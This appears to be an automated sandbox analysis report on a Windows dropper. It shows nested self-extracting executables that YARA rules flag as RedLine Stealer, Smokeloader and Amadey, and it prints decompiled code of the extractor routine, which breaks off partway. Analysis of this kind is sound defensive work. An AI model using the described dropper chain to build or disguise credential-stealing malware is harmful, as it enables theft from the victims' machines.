RT_ICON	0x27ceac0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27cf188	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27cf6f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27d1c98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27d2d40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27d36c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_DIALOG	0x27d3b30	0x86	data
RT_STRING	0x27d3bb8	0x490	data
RT_STRING	0x27d4048	0x3d6	data
RT_STRING	0x27d4420	0x492	data
RT_STRING	0x27d48b4	0x382	data
RT_ACCELERATOR	0x27d4c38	0x48	data	Spanish	Mexico
RT_ACCELERATOR	0x27d4c80	0x18	data	Spanish	Mexico
RT_GROUP_ICON	0x27d4c98	0x68	data	Spanish	Mexico
RT_GROUP_ICON	0x27d4d00	0x4c	data	Spanish	Mexico
RT_GROUP_ICON	0x27d4d4c	0x76	data	Spanish	Mexico
RT_GROUP_ICON	0x27d4dc4	0x76	data	Spanish	Mexico
RT_VERSION	0x27d4e3c	0x1e0	data
RT_MANIFEST	0x27d501c	0x5eb	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
None	0x27d5608	0xa	data

Imports

DLL	Import
KERNEL32.dll	SetDefaultCommConfigW, CreateHardLinkA, GetConsoleAliasesA, LoadLibraryW, _hread, IsBadCodePtr, CreateEventA, FormatMessageW, GetStringTypeExW, GetExitCodeProcess, GetFileAttributesW, WriteConsoleW, WritePrivateProfileSectionW, GetLogicalDriveStringsA, ChangeTimerQueueTimer, SetLastError, GetProcAddress, GlobalAddAtomA, EnumSystemCodePagesW, LocalAlloc, FoldStringA, FreeEnvironmentStringsW, VirtualProtect, GetWindowsDirectoryW, GetFileInformationByHandle, GlobalReAlloc, InterlockedPushEntrySList, LCMapStringW, CloseHandle, CreateFileA, HeapSize, lstrcpynA, CallNamedPipeA, VirtualAlloc, GetVolumeNameForVolumeMountPointA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, RaiseException
USER32.dll	ClientToScreen, LoadMenuA, InvalidateRgn, GetMenuInfo, MessageBoxIndirectW, CountClipboardFormats, SetScrollInfo
GDI32.dll	GetGlyphIndicesW
ADVAPI32.dll	RegOpenKeyA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Mexico

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SzznpUhIjo.exePID: 6092, Parent PID: 3452

General

Target ID:	0
Start time:	21:06:01
Start date:	18/03/2023
Path:	C:\Users\user\Desktop\SzznpUhIjo.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SzznpUhIjo.exe
Imagebase:	0x400000
File size:	1238528 bytes
MD5 hash:	F62FE8447C5E9B9EA5AC424543AD20B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.341685333.0000000006A30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.341440182.0000000006880000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: kino5628.exePID: 6084, Parent PID: 6092

General

Target ID:	1
Start time:	21:06:02
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe
Imagebase:	0x8e0000
File size:	870912 bytes
MD5 hash:	51B7FE413501DC9DD84CF1FCBB4C4BA2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs Detection: 65%, Virustotal, Browse
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: kino6423.exePID: 6028, Parent PID: 6084

General

Target ID:	2
Start time:	21:06:02
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe
Imagebase:	0xe50000
File size:	725504 bytes
MD5 hash:	DB27DCB2B593E449358CEC94D3D257DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 64%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: kino4801.exePID: 6116, Parent PID: 6028

General

Target ID:	3
Start time:	21:06:03
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe
Imagebase:	0x10d0000
File size:	351744 bytes
MD5 hash:	211103CF935C81941C9A7C527A99891E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 59%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: bus7600.exePID: 4084, Parent PID: 6116

General

Target ID:	4
Start time:	21:06:03
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe
Imagebase:	0x820000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 680, Parent PID: 3452

General

Target ID:	6
Start time:	21:06:14
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff6759a0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: con1165.exePID: 5392, Parent PID: 6116

General

Target ID:	9
Start time:	21:06:18
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe
Imagebase:	0x400000
File size:	340992 bytes
MD5 hash:	3930494C030BFEF77C7C0624C1F6BAEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.316668372.0000000002E26000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2432, Parent PID: 3452

General

Target ID:	14
Start time:	21:06:22
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff6759a0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1504, Parent PID: 3452

General

Target ID:	15
Start time:	21:06:30
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Imagebase:	0x7ff6759a0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2460, Parent PID: 3452

General

Target ID:	16
Start time:	21:06:44
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff6759a0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SzznpUhIjo.exePID: 6092, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	23.8%
Dynamic/Decrypted Code Coverage:	65.7%
Signature Coverage:	25.9%
Total number of Nodes:	974
Total number of Limit Nodes:	27

Executed Functions

Function 00403BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00403BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x408004; // 0xee8c6708
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x409124 =  *0x409124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x408a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x408c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0040468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x409124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00401AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00406CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00403FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x408580;
													if( *0x408580 != 0) {
														E00402267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x408180;
											if( *0x408180 == 0) {
												_t146 = 0x4c7;
												E004044B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x409124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x409a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00406495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E004044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x409124 = E00406285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E004044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x408a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x409a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x408a38 & 0x0000ffff;
											_v380 = 0x409154;
											_v376 = _t151;
											_v372 = 0x4091e4;
											_v360 = _t97;
											if( *0x408a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x409a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x408d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x409a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x40a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x409124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x409a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x408a20;
										if( *0x408a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0040202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0040468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x408c42;
									if( *0x408c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x408a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0040468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0040468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00401781( &_v276, 0x104, _t130, 0x408c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0040468F(_t130, 0x409a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00403baa
0x00403bb0
0x00403bb7
0x00403bc0
0x00403bc2
0x00403bc9
0x00403bcb
0x00403bcf
0x00403bd3
0x00403bd9
0x00403bfd
0x00403bfd
0x00403bff
0x00403c03
0x00403c03
0x00403c11
0x00403c16
0x00403c19
0x00403c28
0x00000000
0x00000000
0x00403c30
0x00403c39
0x00403c40
0x00403d13
0x00403d15
0x00403d21
0x00403d26
0x00000000
0x00403c4f
0x00403c56
0x00403c60
0x00403c65
0x00403c77
0x00403c78
0x00403c7c
0x00403c7e
0x00403c82
0x00403c82
0x00000000
0x00403c7c
0x00403c67
0x00403c69
0x00403c6d
0x00000000
0x00403c58
0x00403c58
0x00403c6e
0x00403c6e
0x00403c87
0x00403c89
0x00403d4d
0x00403d4f
0x00403d50
0x00403d52
0x00403d9e
0x00403da8
0x00403daf
0x00403db4
0x00403db6
0x00403f4d
0x00403f4d
0x00403f4f
0x00403f56
0x00403f57
0x00403f58
0x00403f63
0x00403f63
0x00403dbc
0x00403dc0
0x00403dc2
0x00403de6
0x00403de6
0x00403de8
0x00403f0b
0x00403f0b
0x00403f0f
0x00403f13
0x00403f15
0x00403f1a
0x00403f1c
0x00403f46
0x00403f47
0x00000000
0x00403f47
0x00403f1e
0x00403f1f
0x00403f25
0x00403f26
0x00403f2a
0x00403f2d
0x00403fd9
0x00403fd9
0x00403fda
0x00403fda
0x00403fe1
0x00403fe3
0x00403fe3
0x00403fe8
0x00000000
0x00403fe8
0x00403f33
0x00403f37
0x00000000
0x00403f37
0x00403dee
0x00403dee
0x00403df5
0x00403fad
0x00403fb9
0x00403fc2
0x00403fc8
0x00000000
0x00403fc8
0x00403dfb
0x00403dfd
0x00000000
0x00000000
0x00403e03
0x00403e0a
0x00000000
0x00000000
0x00403e15
0x00403e17
0x00403e19
0x00403f94
0x00403fa4
0x00403f7c
0x00403f80
0x00403f8b
0x00000000
0x00403f8b
0x00403e2c
0x00403e30
0x00403e34
0x00403e36
0x00403f69
0x00403f6e
0x00403f70
0x00403f76
0x00000000
0x00403f76
0x00403e3c
0x00403e43
0x00403e47
0x00403e52
0x00403e56
0x00403e5c
0x00403e61
0x00403e68
0x00403e70
0x00403e74
0x00403e7c
0x00403e80
0x00403e82
0x00403e82
0x00403e87
0x00403e87
0x00403e8b
0x00403e91
0x00403e94
0x00403e96
0x00403e96
0x00403e9b
0x00403e9b
0x00403e9f
0x00403ea2
0x00403ea4
0x00403ea4
0x00403ea9
0x00403ea9
0x00403ead
0x00403eb3
0x00403eb6
0x00403eb8
0x00403eb8
0x00403ebd
0x00403ebd
0x00403ec1
0x00403ec3
0x00403ec5
0x00403ec5
0x00403eca
0x00403eca
0x00403ece
0x00403ed5
0x00403ed9
0x00403ee0
0x00403ee6
0x00403eea
0x00403eec
0x00403eee
0x00403ef3
0x00403ef3
0x00403ef5
0x00403efa
0x00403efb
0x00403efd
0x00403f40
0x00000000
0x00403eff
0x00403eff
0x00403f05
0x00000000
0x00403f05
0x00403efd
0x00403dc7
0x00403dce
0x00000000
0x00000000
0x00403dd0
0x00403dd7
0x00000000
0x00000000
0x00403dd9
0x00403ddb
0x00000000
0x00000000
0x00403ddd
0x00403de1
0x00000000
0x00403de1
0x00403d59
0x00403d65
0x00403d6a
0x00403d6c
0x00000000
0x00000000
0x00403d6e
0x00403d75
0x00000000
0x00000000
0x00403d8f
0x00403d96
0x00403d98
0x00000000
0x00000000
0x00000000
0x00403d98
0x00403c8f
0x00403c98
0x00403cf1
0x00403cf3
0x00000000
0x00000000
0x00403cfe
0x00403d11
0x00000000
0x00000000
0x00000000
0x00403d11
0x00403c9c
0x00403ca5
0x00403ca7
0x00000000
0x00000000
0x00403cad
0x00403cb2
0x00403cb7
0x00403cc5
0x00000000
0x00000000
0x00403ce8
0x00403cec
0x00403ced
0x00403ced
0x00000000
0x00403ce8
0x00403c9e
0x00000000
0x00403c9e
0x00403c56
0x00403d35
0x00403d35
0x00403d3c
0x00403d48
0x00000000
0x00403d48
0x00403c03
0x00403be2
0x00403be7
0x00403bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00403C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00403CDC

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00408C42), ref: 00403D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00403E26
FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403EFF
LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F1F
FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403F40
LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00408C42), ref: 00403F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403FC2

Strings

SHOWWINDOW, xrefs: 00403C34
ADMQCMD, xrefs: 00403C9E
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00403E74
<None>, xrefs: 00403CC9, 00403D7D
RUNPROGRAM, xrefs: 00403D05
USRQCMD, xrefs: 00403CAD
doza2, xrefs: 00403E68
advpack.dll, xrefs: 00403F9D
DoInfInstall, xrefs: 00403E1F, 00403E24, 00403F68
REBOOT, xrefs: 00403BE2
POSTRUNPROGRAM, xrefs: 00403D60
D, xrefs: 00403C19

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-2941528158
Opcode ID: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
Instruction ID: 4eb6e881215b4124141a09aa4552a99e739b7383a09d60a45f4522afb61a9575
Opcode Fuzzy Hash: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
Instruction Fuzzy Hash: C0B1B4706083019BE720DF248945B6B7AE8AB84715F10493FFA85F62E1D77C8D45CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x408004; // 0xee8c6708
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00401680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00401A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00401781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					E0040658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
